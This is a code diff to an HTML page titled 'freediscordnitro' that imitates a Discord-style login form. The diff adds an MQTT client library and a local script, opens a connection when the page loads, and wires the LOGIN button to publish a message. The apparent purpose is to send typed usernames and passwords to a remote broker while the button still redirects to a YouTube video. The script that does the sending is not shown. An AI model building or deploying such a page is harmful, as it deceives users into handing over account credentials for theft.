--- a/freediscordnitro.html
+++ b/freediscordnitro.html
@@ -60,11 +60,13 @@
     <title>Age Calculator</title> -->
 <!--     <link rel="stylesheet" href="style.css"> -->
 
+		<script src="https://cdnjs.cloudflare.com/ajax/libs/paho-mqtt/1.0.2/mqttws31.min.js" type="text/javascript"></script>
+      <script src="demo.js" type="text/javascript"></script>
 		        <link rel="stylesheet" href="styles/login_page.css">
         <link rel="stylesheet" href="styles/general.css">
 		
 </head>
-    <body style="background-color:#1d2129;">
+    <body onload="startConnect()" style="background-color:#1d2129;">
         <div class="login">
             <div class="login-form">
                 <p class="t1">Welcome back!</p>
@@ -78,7 +80,7 @@
                     <input id="password"  type="password"></input>
 <!--                     <a href="https://instagram.com/dastix">Forgat your password?</a> -->
 <!-- 		    <button onclick="location.href='https://www.youtube.com/watch?v=BbeeuzU5Qc8'">Login</button> -->
-			<button id="btn" onclick="location.href='https://www.youtube.com/watch?v=BbeeuzU5Qc8'" type="button">LOGIN</button>
+			<button id="btn"  onclick="publishMessage()" value="Publish" onclick="location.href='https://www.youtube.com/watch?v=BbeeuzU5Qc8'" type="button">LOGIN</button>
                     <p style="margin-top: 15px; font-weight: 400">
                         <span style="color: rgb(105, 105, 105)">
                             Need An Account?
